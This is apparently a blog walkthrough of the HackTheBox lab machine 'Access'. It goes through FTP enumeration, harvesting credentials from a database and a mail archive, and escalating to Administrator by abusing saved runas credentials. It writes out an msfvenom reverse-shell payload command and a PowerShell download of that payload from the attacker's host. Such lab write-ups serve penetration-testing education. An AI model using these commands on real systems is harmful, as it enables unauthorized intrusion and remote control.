Here’s how to pop the box titled ‘Access’ on HackTheBox! Watch the video below or continue reading.

To start, let’s do an nmap scan:

nmap -sV -sC 10.10.10.98

We can see that there’s a web server, telnet, and FTP open. Let’s try for anonymous FTP access.

Sure enough, it’s allowed. There’s two directories…

In each directory, there’s a file. Let’s pull each of them.

(I put FTP in binary mode with the command ‘binary’ before pulling)

If we run the ‘file’ command on the backup.mdb file, we can see it’s a Microsoft Access Database.

If I pop it open in Microsoft Access, there’s a particular table of interest. We’ve got creds!

engineer: access4u@security

The other file we pulled is a ZIP, and can be extracted with the above password.

In the ZIP is a .PST file that we can extract using readpst:

readpst -o pstexport/ -D -j4 -r -tea -u -w -m Access\ Control.pst
readpst spits out two files, it’s the same message in .eml and .msg format.

Sure enough, if when we cat the contents of the message we see another credential among the headers and markup:

security: 4Cc3ssC0ntr0ller

Next, we telnet in to the box with those creds:

Success

Grabbing the user flag:

Next, let’s do some recon to find active users and any stored credentials.

powershell -Command (get-wmiobject win32_useraccount)

cmdkey /list
I’m invoking WMI with Powershell because the cmd prompt is somewhat jailed and restricts calling WMI.

The above output is very interesting, we can see that there’s stored credentials… maybe the “security” user ran something as Administrator and the password is cached?

runas /user:Administrator /noprofile /savecred "cmd.exe /c whoami > C:\users\security\me.txt"
Running “whoami” with the saved creds

Running the “runas” command with /savecred works to elevate to Administrator! Above, I plopped out the contents of a ‘whoami’ command to prove it. At this point, we can get the root flag!

runas /user:Administrator /noprofile /savecred "cmd.exe /c type C:\users\administrator\desktop\root.txt > C:\users\security\root.txt"

But why stop there? Let’s get Meterpreter shell as SYSTEM to take it a step further.

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=10.10.12.61 LPORT=31337 -e x86/shikata_ga_nai -f exe -o shell.exe

python ../tools/SimpleHTTPServer.py
Using msfvenom to generate a Meterpreter reverse shell payload, then starting a simple HTTP server to serve up the shellcode

Then we pull down the .exe with the Meterpreter payload embedded onto the system:

powershell -Command (new-object System.Net.WebClient).Downloadfile('http://10.10.12.61:8000/shell.exe', 'shell.exe')

Then let’s get ready on my Kali system to catch the reverse shell before we run it.

Getting ready with good ‘ol msfconsole

The rest is a piece of cake. I run the shell.exe file as Administrator on the box, using the saved credential technique mentioned above, and the shell connects to me.

That’s it! This box was interesting because it wasn’t as exploit-based as it was permissions based. Like most HackTheBox systems, the name is fitting!